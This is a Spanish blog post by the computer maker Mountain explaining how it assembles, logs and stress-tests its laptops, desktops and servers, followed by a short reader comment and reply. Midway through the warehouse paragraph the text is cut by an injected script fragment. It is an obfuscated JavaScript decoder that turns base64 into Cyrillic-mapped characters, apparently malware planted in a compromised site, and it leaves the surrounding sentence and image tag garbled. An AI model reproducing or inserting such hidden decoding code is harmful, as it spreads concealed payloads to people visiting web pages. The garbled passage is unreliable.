MOUNTAIN Noticias y Reviews Cómo llevamos a cabo el montaje y las pruebas en Mountain

Noticias y Reviews

Cómo llevamos a cabo el montaje y las pruebas en Mountain

Share on Facebook0Tweet about this on TwitterShare on LinkedIn17Pin on Pinterest0Email this to someone

Producción_0

Mountain se caracteriza por ser una empresa que cuida con mucho mimo la producción de sus ordenadores. Dentro del proceso por el que se lleva a cabo el montaje de ordenadores, ya sean portátiles o sobremesa, hemos creado una cadena muy elaborada que seguimos con especial atención, con el fin de que cada equipo obtenga la mejor garantía.

El departamento de producción consta de tres figuras muy importantes, como son el responsable de montaje, los mozos de almacén y los técnicos montadores. Es por ello, que todos nuestros operarios tienen la cualificación necesaria para el montaje de los equipos, teniendo que reciclarse de forma continuada para hacer frente a los cambios que se producen en una industria tan cambiante como es la informática.

Producción de un ordenador en Mountain

Producción de un ordenador en Mountain

El proceso de producción es complejo, pero está muy bien estructurado a su vez, puesto que cada ordenador puede llevar una configuración diferente, en función de lo que solicite cada cliente. En un primer momento, una vez que se ha validado el ingreso correspondiente al pedido del equipo en el banco, se procede a incluirlo en el registro de validación de pedidos, con lo que se genera una orden de montaje. Dependiendo de dónde se produzca el pedido (si ha sido proveniente de la web o de un presupuesto emitido con anterioridad), se procederá a validar el pago en el sistema informático.

A partir de aquí es cuando se planifica el montaje del ordenador solicitado, que está dividido por un código interno de colores, dividiéndolos en portátiles, sobremesa y servidores. El responsable de montaje especifica el tipo de producto que se debe montar, y asigna a cada técnico en el llamado en Mountain Sistemas de Slots de Producción diarios.

Desde aquí hay una serie de procesos que hay que seguir, como registrar la fecha de fabricación de cada ordenador, comunicar al área de pedidos cuándo sale el producto a su destino para entregarlo al cliente o preparar la documentación del equipo para que, después, en logística, se lleve a cabo el proceso de banasting.

las pruebas de stress son exhaustivas gracias a nuestro software especializado para ello

las pruebas de stress que se realizan a cada equipo son exhaustivas y, gracias a nuestro software especializado, se verifica su buen funcionamiento

Para que todo siga su curso de manera correcta, si hubiese un problema durante todo el proceso de montaje, ya sea por falta de componentes, recursos o fallos en las pruebas, el responsable del departamento de montaje y pruebas ha de informar al departamento comercial de todos los datos concernientes a las incidencias.

El trabajo en logística se basa en el proceso de banasting, por el que reciben toda la documentación del equipo a montar, recopilan el material y se asigna una orden de montaje, la cual implica dar de baja del stock el equipo que se va a enviar una vez montado. El sistema informático es el encargado de asignar el número de serie al producto e identificarlo claramente.

En el  almacén se distribuyen todos los pedidos, llevand<script type=

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6o todos un excrupuloso orden " src="http://noticias.mountain.es/wp-content/uploads/2014/03/Logística.jpg" width="700" height="453" /> En logística se distribuyen todos los pedidos, llevando todos un escrupuloso orden

Una vez que todo el montaje se ha realizado y el ordenador tiene todos sus componentes instalados, se procede al control de calidad, donde se somete al equipo a pruebas de stress. Este proceso es muy importante en Mountain, ya que del buen rendimiento del equipo depende que pueda llegar sin errores y con todas las garantías hacia el cliente.

Después de haberse cerciorado mediante pruebas, el ordenador está listo para ser llevado a logística, lugar donde se embala correctamente cada producto para destinarlo a su lugar. Nuestra agencia de transporte hace el resto, procurando que cada caja llegue en perfecto estado a su destino.

2 comentarios en “Cómo llevamos a cabo el montaje y las pruebas en Mountain

  1. Una información muy interesante y muy biene xplicada sobre cómo Mountain lleva a cabo el montaje y pruebas de ordenadores, ya que esta empresa se caracteriza por cuidar la producción de sus ordenadores, ya sean portátiles o sobremesa. Por ello, es bueno conocer cómo obtienen la mejor garantía de producto.

    • Hola Antonio, muchas gracias por la parte que nos toca. Intentamos ser lo más transparentes y cercanos posible.

      Un saludo y te agradecemos que nos leas.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *